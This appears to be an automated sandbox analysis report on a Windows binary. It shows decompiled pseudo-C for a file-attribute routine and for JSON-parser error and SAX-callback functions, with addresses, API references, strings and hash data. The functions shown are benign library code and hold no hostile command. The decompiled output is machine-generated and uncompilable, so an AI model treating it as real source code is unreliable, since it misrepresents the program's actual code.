								_t89 =  *(_t118 + 0x10);
								if(_t89 == 6 || (_t89 & 0x00000022) == 0) {
									L27:
									if((_t89 & 0x00000006) == 0) {
										L30:
										if((_t89 & 0x00000018) == 0) {
											L33:
											if(_t89 != 0) {
												_t133 = 0x32;
											} else {
												_t133 = 0;
											}
											goto L36;
										}
										_push(0x18);
										_push( &_v44);
										_push(1);
										_push(_t137);
										if( *0x22d2a4() == 0) {
											goto L25;
										}
										 *((intOrPtr*)(_t131 + 8)) = _v36;
										 *((intOrPtr*)(_t131 + 0x18)) = _v28;
										 *((intOrPtr*)(_t131 + 0xc)) = _v32;
										_t89 =  *(_t118 + 0x10) & 0xffffffe7;
										goto L33;
									}
									_push(8);
									_push( &_v112);
									_push(9);
									_push(_t137);
									if( *0x22d2a4() == 0) {
										goto L25;
									}
									 *(_t131 + 0x10) = _v112;
									 *(_t131 + 0x14) = _v108;
									_t89 =  *(_t118 + 0x10) & 0xfffffff9;
									 *(_t118 + 0x10) = _t89;
									goto L30;
								} else {
									_push(0x28);
									_push( &_v100);
									_push(0);
									_push(_t137);
									if( *0x22d2a4() != 0) {
										 *(_t131 + 0x10) = _v68;
										 *_t131 = _v84;
										_t89 =  *(_t118 + 0x10) & 0xffffffdd;
										 *((intOrPtr*)(_t131 + 4)) = _v80;
										 *(_t118 + 0x10) = _t89;
										goto L27;
									}
									L25:
									_t133 = GetLastError();
									L36:
									E001FEC56(_t118, _t133, _t137, _t137);
									_t81 = _t133;
									goto L38;
								}
							}
							_t133 = _t88;
							goto L36;
						} else {
							if(GetFileAttributesExW(_t135, 0,  &_v56) != 0) {
								_t126 = _v56;
								if(_v101 == 0 || (_t126 >> 0x0000000a & 0x00000001) == 0) {
									 *(_t131 + 0x10) = _t126;
									asm("adc ecx, 0x0");
									 *((intOrPtr*)(_t131 + 8)) = 0 + _v24;
									_t33 = _t118 + 0x10;
									 *_t33 =  *(_t118 + 0x10) & 0xffffffd5;
									 *((intOrPtr*)(_t131 + 0xc)) = _v28;
									 *_t131 = _v36;
									 *((intOrPtr*)(_t131 + 4)) = _v32;
									if( *_t33 == 0) {
										goto L37;
									}
									goto L19;
								} else {
									L19:
									_t80 = _v101;
									goto L20;
								}
							}
							_t81 = GetLastError();
							goto L38;
						}
					}
				} else {
					_t81 = 0x57;
					L38:
					_pop(_t132);
					_pop(_t136);
					return L002007E2(_t81, _t118, _v16 ^ _t140, _t129, _t132, _t136);
				}
			}

0x001ff14a
0x001ff14b
0x001ff14d
0x001ff14e
0x001ff159
0x001ff15d
0x001ff162
0x001ff169
0x001ff16c
0x001ff172
0x001ff175
0x001ff177
0x001ff17a
0x001ff17d
0x001ff181
0x001ff186
0x001ff199
0x001ff1a2
0x001ff1c4
0x001ff1a9
0x001ff1b0
0x001ff1b3
0x001ff1b9
0x001ff1bc
0x001ff1bf
0x001ff1bf
0x001ff1b3
0x001ff1c9
0x001ff322
0x001ff322
0x00000000
0x001ff1cf
0x001ff1d2
0x001ff23f
0x001ff256
0x001ff25b
0x001ff25e
0x001ff263
0x001ff26c
0x001ff272
0x001ff2b2
0x001ff2b4
0x001ff2de
0x001ff2e0
0x001ff30d
0x001ff30f
0x001ff317
0x001ff311
0x001ff311
0x001ff311
0x00000000
0x001ff30f
0x001ff2e2
0x001ff2e7
0x001ff2e8
0x001ff2ea
0x001ff2f3
0x00000000
0x00000000
0x001ff2fb
0x001ff301
0x001ff307
0x001ff30a
0x00000000
0x001ff30a
0x001ff2b6
0x001ff2bb
0x001ff2bc
0x001ff2be
0x001ff2c7
0x00000000
0x00000000
0x001ff2cc
0x001ff2d2
0x001ff2d8
0x001ff2db
0x00000000
0x001ff278
0x001ff278
0x001ff27d
0x001ff27e
0x001ff280
0x001ff289
0x001ff29e
0x001ff2a4
0x001ff2a9
0x001ff2ac
0x001ff2af
0x00000000
0x001ff2af
0x001ff28b
0x001ff291
0x001ff318
0x001ff319
0x001ff31e
0x00000000
0x001ff31e
0x001ff272
0x001ff265
0x00000000
0x001ff1e5
0x001ff1f4
0x001ff205
0x001ff208
0x001ff215
0x001ff21e
0x001ff221
0x001ff224
0x001ff224
0x001ff22b
0x001ff231
0x001ff233
0x001ff236
0x00000000
0x00000000
0x00000000
0x001ff23c
0x001ff23c
0x001ff23c
0x00000000
0x001ff23c
0x001ff208
0x001ff1f6
0x00000000
0x001ff1f6
0x001ff1d2
0x001ff191
0x001ff193
0x001ff324
0x001ff327
0x001ff32a
0x001ff336
0x001ff336

APIs

GetFileAttributesExW.KERNEL32(?,00000000,?,?,00000000), ref: 001FF1EC
GetLastError.KERNEL32(?,00000000), ref: 001FF1F6
___std_fs_open_handle@16.LIBCPMT ref: 001FF256

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AttributesErrorFileLast___std_fs_open_handle@16
String ID:
API String ID: 617199260-0
Opcode ID: f551395b53044a2528edb9d6bdeb97b1d1e8d78e0c6428a10efe771fce8a6069
Instruction ID: 97b29560edc425fde51cca6f8ffd34906333b6ab56ef63f704d1bba5843d1ef1
Opcode Fuzzy Hash: f551395b53044a2528edb9d6bdeb97b1d1e8d78e0c6428a10efe771fce8a6069
Instruction Fuzzy Hash: 82616075A007099BDB28CF68D9457B9B7B4BF05310F144629EE65EB381D7B0E912CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E4016, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E001E4016(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __esi;
				void* _t76;
				void* _t79;
				void* _t84;
				void* _t87;
				void* _t92;
				void* _t95;
				void* _t97;
				void* _t104;
				void* _t105;
				void* _t110;
				char _t111;
				char* _t157;
				intOrPtr _t160;
				void* _t163;
				void* _t165;
				char** _t166;

				L00227790(0x229932, _t163);
				_t166 = _t165 - 0x7c;
				_t110 = __ecx;
				 *(_t163 - 4) = 0;
				 *(_t163 - 0x10) = 0;
				_t157 =  *((intOrPtr*)(_t163 + 8));
				_t160 = 0xf;
				 *_t157 = 0;
				 *((intOrPtr*)(_t157 + 0x10)) = 0;
				 *((intOrPtr*)(_t157 + 0x14)) = _t160;
				 *_t157 = 0;
				L001D2F8E("syntax error ");
				_t74 =  *((intOrPtr*)(_t163 + 0x10));
				 *(_t163 - 4) =  *(_t163 - 4) & 0x00000000;
				 *(_t163 - 0x10) = 1;
				if( *((intOrPtr*)( *((intOrPtr*)(_t163 + 0x10)) + 0x10)) != 0) {
					_t104 = E001DC25D(__ecx, _t163 - 0x28, "while parsing ");
					 *(_t163 - 4) = 1;
					 *_t166 = " ";
					_t105 = E001DC2EA(_t163 - 0x40, _t104, _t74);
					 *(_t163 - 4) = 2;
					E001D24B1(_t105);
					E001D2F2D(_t163 - 0x40);
					 *(_t163 - 4) = 0;
					E001D2F2D(_t163 - 0x28);
				}
				L001D2FAF(_t157, "- ", 2);
				_t116 =  *((intOrPtr*)(_t110 + 0x28));
				if( *((intOrPtr*)(_t110 + 0x28)) != 0xe) {
					_t76 = E001E46BD(_t116);
					_t111 = 0;
					 *((intOrPtr*)(_t163 - 0x14)) = _t160;
					 *((intOrPtr*)(_t163 - 0x28)) = 0;
					 *((intOrPtr*)(_t163 - 0x18)) = 0;
					 *((char*)(_t163 - 0x28)) = 0;
					L001D2F8E(_t76);
					 *(_t163 - 4) = 8;
					_t79 = E001DC2AE(_t163 - 0x88, "unexpected ", _t163 - 0x28);
					 *(_t163 - 4) = 9;
					E001D24B1(_t79);
					E001D2F2D(_t163 - 0x88);
					 *(_t163 - 4) = 0;
					E001D2F2D(_t163 - 0x28);
				} else {
					_push(_t163 - 0x88);
					_t92 = E001E4242(_t110 + 0x30);
					 *(_t163 - 4) = 3;
					 *((intOrPtr*)(_t163 - 0x14)) = 0xf;
					 *((intOrPtr*)(_t163 - 0x28)) = 0;
					 *((intOrPtr*)(_t163 - 0x18)) = 0;
					 *((char*)(_t163 - 0x28)) = 0;
					L001D2F8E( *((intOrPtr*)(_t110 + 0x70)));
					 *(_t163 - 4) = 4;
					_t95 = E001DC2EA(_t163 - 0x70, _t163 - 0x28, "; last read: \'");
					_push(_t92);
					 *(_t163 - 4) = 5;
					E001DC4A7(_t163 - 0x40, _t92,  *((intOrPtr*)(_t163 + 8)), _t95);
					 *(_t163 - 0x10) = 3;
					 *(_t163 - 4) = 6;
					_t97 = E001DC2EA(_t163 - 0x58, _t163 - 0x40, "\'");
					 *(_t163 - 4) = 7;
					E001D24B1(_t97);
					E001D2F2D(_t163 - 0x58);
					E001D2F2D(_t163 - 0x40);
					E001D2F2D(_t163 - 0x70);
					E001D2F2D(_t163 - 0x28);
					_t111 = 0;
					 *(_t163 - 4) = 0;
					E001D2F2D(_t163 - 0x88);
					_t160 = 0xf;
				}
				_t123 =  *((intOrPtr*)(_t163 + 0xc));
				if( *((intOrPtr*)(_t163 + 0xc)) != 0) {
					_t84 = E001E46BD(_t123);
					 *((intOrPtr*)(_t163 - 0x28)) = _t111;
					 *((intOrPtr*)(_t163 - 0x18)) = _t111;
					 *((intOrPtr*)(_t163 - 0x14)) = _t160;
					 *((char*)(_t163 - 0x28)) = _t111;
					L001D2F8E(_t84);
					 *(_t163 - 4) = 0xa;
					_t87 = E001DC2AE(_t163 - 0x88, "; expected ", _t163 - 0x28);
					 *(_t163 - 4) = 0xb;
					E001D24B1(_t87);
					E001D2F2D(_t163 - 0x88);
					E001D2F2D(_t163 - 0x28);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t163 - 0xc));
				return _t157;
			}

0x001e401b
0x001e4020
0x001e4026
0x001e4028
0x001e402c
0x001e4030
0x001e4037
0x001e403d
0x001e403f
0x001e4042
0x001e4045
0x001e4047
0x001e404c
0x001e404f
0x001e4053
0x001e405e
0x001e4069
0x001e406e
0x001e407a
0x001e4081
0x001e408a
0x001e408e
0x001e4096
0x001e409e
0x001e40a2
0x001e40a2
0x001e40b0
0x001e40b5
0x001e40bb
0x001e4179
0x001e417e
0x001e4180
0x001e4183
0x001e418a
0x001e418d
0x001e4190
0x001e4198
0x001e41ab
0x001e41b4
0x001e41b8
0x001e41c3
0x001e41cb
0x001e41ce
0x001e40c1
0x001e40ca
0x001e40cb
0x001e40d2
0x001e40e1
0x001e40e8
0x001e40eb
0x001e40ee
0x001e40f1
0x001e40fe
0x001e4105
0x001e410b
0x001e410d
0x001e4117
0x001e411c
0x001e412b
0x001e4132
0x001e413b
0x001e413f
0x001e4147
0x001e414f
0x001e4157
0x001e415f
0x001e4164
0x001e416c
0x001e416f
0x001e4176
0x001e4176
0x001e41d3
0x001e41d8
0x001e41da
0x001e41df
0x001e41e6
0x001e41e9
0x001e41ec
0x001e41ef
0x001e41f7
0x001e420a
0x001e4213
0x001e4217
0x001e4222
0x001e422a
0x001e422a
0x001e4237
0x001e423f

APIs

__EH_prolog.LIBCMT ref: 001E401B

Part of subcall function 001D2F2D: _Deallocate.LIBCONCRT ref: 001D2F3C

Strings

; last read: ', xrefs: 001E40F6
; expected , xrefs: 001E41FF
syntax error , xrefs: 001E4038
while parsing , xrefs: 001E4061
unexpected , xrefs: 001E41A0

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DeallocateH_prolog
String ID: ; expected $; last read: '$syntax error $unexpected $while parsing
API String ID: 3708980276-4239264347
Opcode ID: 2d6f0390e73d8e05385a7c6f9c19e0b2d6ca6ddfea26a4d70f00b9a316cb5cc8
Instruction ID: 6f45fd385219a425621602373fd79f35d4d69a28961dff870a2402f2f6d1a2a7
Opcode Fuzzy Hash: 2d6f0390e73d8e05385a7c6f9c19e0b2d6ca6ddfea26a4d70f00b9a316cb5cc8
Instruction Fuzzy Hash: CD616EB0901249DFCB05EFA4C891BEDFBB4AF7A310F14545AE415F7282DBB45A88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 001E80D6, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 001E80DB

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E80EB, 001E80FB, 001E81AD, 001E81EE, 001E8230
not keep_stack.empty(), xrefs: 001E80FC
not key_keep_stack.empty(), xrefs: 001E81EF
object_element, xrefs: 001E8235
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E81AE

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 27e928b6dd22c8ab7947aa27118a1174f5f395905e7f4815b4d14b53fd0614f0
Instruction ID: 11cf6843fe8997e7b1eb0526c7507229d8520ad7f0ce8c3da994b97ffe55342a
Opcode Fuzzy Hash: 27e928b6dd22c8ab7947aa27118a1174f5f395905e7f4815b4d14b53fd0614f0
Instruction Fuzzy Hash: 7D512731A10A44DFCB04EF65C886BAEBBB5FF55310F048058E80AAF296DB70ED55CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001E8285, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001E8285(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t54;
				signed int _t60;
				char* _t62;
				signed int _t64;
				signed int** _t66;
				signed int _t71;
				signed int* _t85;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t103;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				char* _t121;
				void* _t124;
				void* _t126;
				void* _t127;

				L00227790(0x229d57, _t124);
				_t127 = _t126 - 0x1c;
				_t85 = __ecx;
				_push(_t115);
				 *((intOrPtr*)(_t124 - 0x10)) = __ecx;
				_t120 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t131 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t115, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t131, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t127 = _t127 + 0xc;
				}
				_t54 = E001E6AE0( &(_t85[4]), _t124 - 0x18);
				_t114 = 1 << _t54[1];
				if(( *( *_t54) & 1 << _t54[1]) != 0) {
					E001E9006(_t124 - 0x28,  *((intOrPtr*)(_t124 + 0xc)));
					 *(_t124 - 4) =  *(_t124 - 4) & 0x00000000;
					_push(_t124 - 0x28);
					_t60 = E001E6C45(_t85,  &(_t85[0xe]), _t115, _t85[2] - _t85[1] >> 2, 5);
					__eflags = _t60;
					if(_t60 == 0) {
						L20:
						_t121 =  *((intOrPtr*)(_t124 + 8));
						_t47 = _t121 + 4;
						 *_t47 =  *(_t121 + 4) & 0x00000000;
						__eflags =  *_t47;
						 *_t121 = 0;
						L21:
						E001E3876(_t85, _t124 - 0x28, _t114);
						_t62 = _t121;
						goto L22;
					}
					__eflags = _t85[1] - _t85[2];
					if(_t85[1] != _t85[2]) {
						_t64 = _t85[2];
						_t95 =  *(_t64 - 4);
						__eflags = _t95;
						if(_t95 == 0) {
							goto L20;
						}
						_t96 =  *_t95;
						__eflags = _t96 - 2;
						if(_t96 != 2) {
							__eflags = _t96 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t120);
								_t64 = _t85[2];
								_t127 = _t127 + 0xc;
							}
						}
						_t97 =  *(_t64 - 4);
						__eflags =  *_t97 - 2;
						if( *_t97 != 2) {
							__eflags = _t85[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"not key_keep_stack.empty()", _t120);
								_t127 = _t127 + 0xc;
							}
							_t66 = E001E6AE0( &(_t85[8]), _t124 - 0x18);
							_t123 = _t66[1];
							_t117 =  *( *_t66);
							E001E6A89(_t85,  &(_t85[8]));
							_t71 = 1 << _t66[1];
							__eflags = _t117 & _t71;
							if((_t117 & _t71) == 0) {
								goto L20;
							} else {
								_t118 =  *((intOrPtr*)(_t124 - 0x10));
								__eflags =  *(_t118 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t85, _t114, _t118, _t123, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t127 = _t127 + 0xc;
								}
								E001E3BE4(_t127 - 0x10, _t124 - 0x28);
								E001E4373(_t85,  *(_t118 + 0x30));
								_t103 =  *(_t118 + 0x30);
								goto L7;
							}
						} else {
							E001E8AF8(_t85,  *((intOrPtr*)(_t97 + 8)), _t115, _t124 - 0x28);
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85[2] - 4)) + 8)) + 4)) - 0x10;
							L7:
							_t121 =  *((intOrPtr*)(_t124 + 8));
							 *_t121 = 1;
							 *(_t121 + 4) = _t103;
							goto L21;
						}
					}
					E001E3BE4(_t127 - 0x10, _t124 - 0x28);
					E001E4373(_t85,  *_t85);
					_t103 =  *_t85;
					goto L7;
				} else {
					_t62 =  *((intOrPtr*)(_t124 + 8));
					 *(_t62 + 4) =  *(_t62 + 4) & 0x00000000;
					 *_t62 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t124 - 0xc));
					return _t62;
				}
			}

0x001e828a
0x001e828f
0x001e8293
0x001e8296
0x001e8297
0x001e829a
0x001e829f
0x001e82a3
0x001e82a5
0x001e82b0
0x001e82b5
0x001e82b5
0x001e82bf
0x001e82cc
0x001e82d0
0x001e82e7
0x001e82ec
0x001e82f9
0x001e8303
0x001e8308
0x001e830a
0x001e840f
0x001e840f
0x001e8412
0x001e8412
0x001e8412
0x001e8416
0x001e8419
0x001e841c
0x001e8421
0x00000000
0x001e8421
0x001e8313
0x001e8316
0x001e833d
0x001e8340
0x001e8343
0x001e8345
0x00000000
0x00000000
0x001e834b
0x001e834d
0x001e8350
0x001e8352
0x001e8355
0x001e8357
0x001e8362
0x001e8367
0x001e836a
0x001e836a
0x001e8355
0x001e836d
0x001e8370
0x001e8373
0x001e8392
0x001e8396
0x001e8398
0x001e83a3
0x001e83a8
0x001e83a8
0x001e83b2
0x001e83ba
0x001e83bf
0x001e83c1
0x001e83cb
0x001e83cd
0x001e83cf
0x00000000
0x001e83d1
0x001e83d1
0x001e83d4
0x001e83d8
0x001e83da
0x001e83e9
0x001e83ee
0x001e83ee
0x001e83fa
0x001e8402
0x001e8407
0x00000000
0x001e8407
0x001e8375
0x001e837c
0x001e838d
0x001e832f
0x001e832f
0x001e8332
0x001e8335
0x00000000
0x001e8335
0x001e8373
0x001e8321
0x001e8328
0x001e832d
0x00000000
0x001e82d2
0x001e82d2
0x001e82d5
0x001e82d9
0x001e8423
0x001e8428
0x001e8431
0x001e8431

APIs

__EH_prolog.LIBCMT ref: 001E828A

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E829A, 001E82AA, 001E835C, 001E839D, 001E83DF
not keep_stack.empty(), xrefs: 001E82AB
not key_keep_stack.empty(), xrefs: 001E839E
object_element, xrefs: 001E83E4
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E835D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
String ID: A:\_Work\rc-build-v1-exe\json.hpp$not keep_stack.empty()$not key_keep_stack.empty()$object_element$ref_stack.back()->is_array() or ref_stack.back()->is_object()
API String ID: 3519838083-2786698324
Opcode ID: 5aa05c02ec3931fac3b08c92f818d904dec9c30f4a59275103f555c3bbde804c
Instruction ID: 9d8bbf9e4a54e671e32f50a81cded0a50e53d6179e6ef256543a0f55ff4c880d
Opcode Fuzzy Hash: 5aa05c02ec3931fac3b08c92f818d904dec9c30f4a59275103f555c3bbde804c
Instruction Fuzzy Hash: 4D51F331A00644DFCB14EF66C486BAEBBA5FF55310F048068E809AF2D6DB71ED54CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001E8434, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E001E8434(signed int* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int** _t54;
				signed int _t60;
				char* _t62;
				signed int _t64;
				signed int** _t66;
				signed int _t71;
				signed int* _t85;
				signed int _t95;
				void* _t96;
				signed int _t97;
				signed int _t103;
				void* _t115;
				signed int _t117;
				intOrPtr _t118;
				char* _t121;
				void* _t124;
				void* _t126;
				void* _t127;

				L00227790(0x229d57, _t124);
				_t127 = _t126 - 0x1c;
				_t85 = __ecx;
				_push(_t115);
				 *((intOrPtr*)(_t124 - 0x10)) = __ecx;
				_t120 = L"A:\\_Work\\rc-build-v1-exe\\json.hpp";
				_t131 =  *((intOrPtr*)(__ecx + 0x1c));
				if( *((intOrPtr*)(__ecx + 0x1c)) == 0) {
					_push(0x1240);
					E0020F0F9(__ecx, __edx, _t115, L"A:\\_Work\\rc-build-v1-exe\\json.hpp", _t131, L"not keep_stack.empty()", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
					_t127 = _t127 + 0xc;
				}
				_t54 = E001E6AE0( &(_t85[4]), _t124 - 0x18);
				_t114 = 1 << _t54[1];
				if(( *( *_t54) & 1 << _t54[1]) != 0) {
					E001E90D2(_t124 - 0x28,  *((intOrPtr*)(_t124 + 0xc)));
					 *(_t124 - 4) =  *(_t124 - 4) & 0x00000000;
					_push(_t124 - 0x28);
					_t60 = E001E6C45(_t85,  &(_t85[0xe]), _t115, _t85[2] - _t85[1] >> 2, 5);
					__eflags = _t60;
					if(_t60 == 0) {
						L20:
						_t121 =  *((intOrPtr*)(_t124 + 8));
						_t47 = _t121 + 4;
						 *_t47 =  *(_t121 + 4) & 0x00000000;
						__eflags =  *_t47;
						 *_t121 = 0;
						L21:
						E001E3876(_t85, _t124 - 0x28, _t114);
						_t62 = _t121;
						goto L22;
					}
					__eflags = _t85[1] - _t85[2];
					if(_t85[1] != _t85[2]) {
						_t64 = _t85[2];
						_t95 =  *(_t64 - 4);
						__eflags = _t95;
						if(_t95 == 0) {
							goto L20;
						}
						_t96 =  *_t95;
						__eflags = _t96 - 2;
						if(_t96 != 2) {
							__eflags = _t96 - 1;
							if(__eflags != 0) {
								_push(0x1263);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"ref_stack.back()->is_array() or ref_stack.back()->is_object()", _t120);
								_t64 = _t85[2];
								_t127 = _t127 + 0xc;
							}
						}
						_t97 =  *(_t64 - 4);
						__eflags =  *_t97 - 2;
						if( *_t97 != 2) {
							__eflags = _t85[0xb];
							if(__eflags == 0) {
								_push(0x126d);
								E0020F0F9(_t85, _t114, _t115, _t120, __eflags, L"not key_keep_stack.empty()", _t120);
								_t127 = _t127 + 0xc;
							}
							_t66 = E001E6AE0( &(_t85[8]), _t124 - 0x18);
							_t123 = _t66[1];
							_t117 =  *( *_t66);
							E001E6A89(_t85,  &(_t85[8]));
							_t71 = 1 << _t66[1];
							__eflags = _t117 & _t71;
							if((_t117 & _t71) == 0) {
								goto L20;
							} else {
								_t118 =  *((intOrPtr*)(_t124 - 0x10));
								__eflags =  *(_t118 + 0x30);
								if(__eflags == 0) {
									_push(0x1276);
									E0020F0F9(_t85, _t114, _t118, _t123, __eflags, L"object_element", L"A:\\_Work\\rc-build-v1-exe\\json.hpp");
									_t127 = _t127 + 0xc;
								}
								E001E3BE4(_t127 - 0x10, _t124 - 0x28);
								E001E4373(_t85,  *(_t118 + 0x30));
								_t103 =  *(_t118 + 0x30);
								goto L7;
							}
						} else {
							E001E8AF8(_t85,  *((intOrPtr*)(_t97 + 8)), _t115, _t124 - 0x28);
							_t103 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t85[2] - 4)) + 8)) + 4)) - 0x10;
							L7:
							_t121 =  *((intOrPtr*)(_t124 + 8));
							 *_t121 = 1;
							 *(_t121 + 4) = _t103;
							goto L21;
						}
					}
					E001E3BE4(_t127 - 0x10, _t124 - 0x28);
					E001E4373(_t85,  *_t85);
					_t103 =  *_t85;
					goto L7;
				} else {
					_t62 =  *((intOrPtr*)(_t124 + 8));
					 *(_t62 + 4) =  *(_t62 + 4) & 0x00000000;
					 *_t62 = 0;
					L22:
					 *[fs:0x0] =  *((intOrPtr*)(_t124 - 0xc));
					return _t62;
				}
			}

0x001e8439
0x001e843e
0x001e8442
0x001e8445
0x001e8446
0x001e8449
0x001e844e
0x001e8452
0x001e8454
0x001e845f
0x001e8464
0x001e8464
0x001e846e
0x001e847b
0x001e847f
0x001e8496
0x001e849b
0x001e84a8
0x001e84b2
0x001e84b7
0x001e84b9
0x001e85be
0x001e85be
0x001e85c1
0x001e85c1
0x001e85c1
0x001e85c5
0x001e85c8
0x001e85cb
0x001e85d0
0x00000000
0x001e85d0
0x001e84c2
0x001e84c5
0x001e84ec
0x001e84ef
0x001e84f2
0x001e84f4
0x00000000
0x00000000
0x001e84fa
0x001e84fc
0x001e84ff
0x001e8501
0x001e8504
0x001e8506
0x001e8511
0x001e8516
0x001e8519
0x001e8519
0x001e8504
0x001e851c
0x001e851f
0x001e8522
0x001e8541
0x001e8545
0x001e8547
0x001e8552
0x001e8557
0x001e8557
0x001e8561
0x001e8569
0x001e856e
0x001e8570
0x001e857a
0x001e857c
0x001e857e
0x00000000
0x001e8580
0x001e8580
0x001e8583
0x001e8587
0x001e8589
0x001e8598
0x001e859d
0x001e859d
0x001e85a9
0x001e85b1
0x001e85b6
0x00000000
0x001e85b6
0x001e8524
0x001e852b
0x001e853c
0x001e84de
0x001e84de
0x001e84e1
0x001e84e4
0x00000000
0x001e84e4
0x001e8522
0x001e84d0
0x001e84d7
0x001e84dc
0x00000000
0x001e8481
0x001e8481
0x001e8484
0x001e8488
0x001e85d2
0x001e85d7
0x001e85e0
0x001e85e0

APIs

__EH_prolog.LIBCMT ref: 001E8439

Strings

A:\_Work\rc-build-v1-exe\json.hpp, xrefs: 001E8449, 001E8459, 001E850B, 001E854C, 001E858E
not keep_stack.empty(), xrefs: 001E845A
not key_keep_stack.empty(), xrefs: 001E854D
object_element, xrefs: 001E8593
ref_stack.back()->is_array() or ref_stack.back()->is_object(), xrefs: 001E850C

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prolog
